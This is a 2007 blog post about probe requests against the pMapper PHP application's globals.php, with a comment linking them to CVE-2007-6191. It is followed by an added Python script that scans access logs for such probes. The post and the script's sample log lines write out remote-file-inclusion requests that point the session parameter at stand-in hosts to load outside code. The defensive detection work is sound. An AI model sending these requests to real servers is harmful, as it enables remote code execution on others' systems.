06 December 2007

Vulnerable PHP application?

I seem to be getting a lot of requests on my webserver of the form: "GET /<directory-path>/pmapper-3.2-beta3/incphp/globals.php?__SESSION[PM_INCPHP]=<some-url>?", where <directory-path> and <some-url> are replaced with a path on your server and some random website respectively. It appears to be a probe to test for some vulnerability, but I don't have the full request logged, only the request up to the question mark on the GET request, so the payload isn't logged. The changing URLs are probably to throw people off the scent.

I must confess, I had no idea what this "pmapper" application was before I observed these hits, nor do I have PHP installed on my webserver, but I figure if I mention it on this blog, an audience who may be able to investigate can do something.

Oh well, I have done my part.
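
A log check for the request pattern described above, as an added example that is not part of the original post. It assumes access logs in Common/Combined Log Format; the sample lines, addresses and hostnames are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines (documentation addresses and hostnames, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Dec/2007:10:01:02 +0000] "GET /maps/pmapper-3.2-beta3/incphp/'
    'globals.php?__SESSION[PM_INCPHP]=http://files.example.net/x.txt? HTTP/1.1" 404 209',
    '198.51.100.7 - - [06/Dec/2007:10:05:40 +0000] "GET /gis/pmapper-3.2-beta3/incphp/'
    'globals.php?__SESSION%5BPM_INCPHP%5D=http%3A%2F%2Fhost.example.org%2Fa%3F HTTP/1.1" 404 209',
    '203.0.113.5 - - [06/Dec/2007:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '203.0.113.5 - - [06/Dec/2007:10:06:09 +0000] "GET /app/incphp/globals.php?lang=en HTTP/1.1" 404 209',
]

# Assumed format: client, identity, user, [time], "METHOD target proto", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3})')
# Parameter name as written in the post; tolerating one or more leading
# underscores is an assumption made here.
PARAM_RE = re.compile(r'^_+SESSION\[PM_INCPHP\]$')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def find_probes(lines):
    """Return {client_ip: [(path, supplied_url, status), ...]} for matching requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.lower().endswith("/incphp/globals.php"):
            continue
        # parse_qsl percent-decodes names and values, so %5B/%5D forms match too.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if PARAM_RE.match(name) and REMOTE_RE.match(value):
                hits[m.group("ip")].append(
                    (parts.path, value.rstrip("?"), int(m.group("status"))))
    return dict(hits)

if __name__ == "__main__":
    for ip, reqs in find_probes(SAMPLE_LOG).items():
        for path, url, status in reqs:
            note = "path missing" if status == 404 else "INVESTIGATE: path answered"
            print(f"{ip} {status} {path} -> {url} ({note})")
```

A 404 on every hit, as on a server without PHP or this application, means the probe found nothing; any other status on a matching request is the case to look into.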

1 comment:

Sheeri K. Cabral said...

Antony,

The security vulnerability that folks are trying to exploit on your site is explained here:

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-6191

Hope that helps you and others!

-Sheeri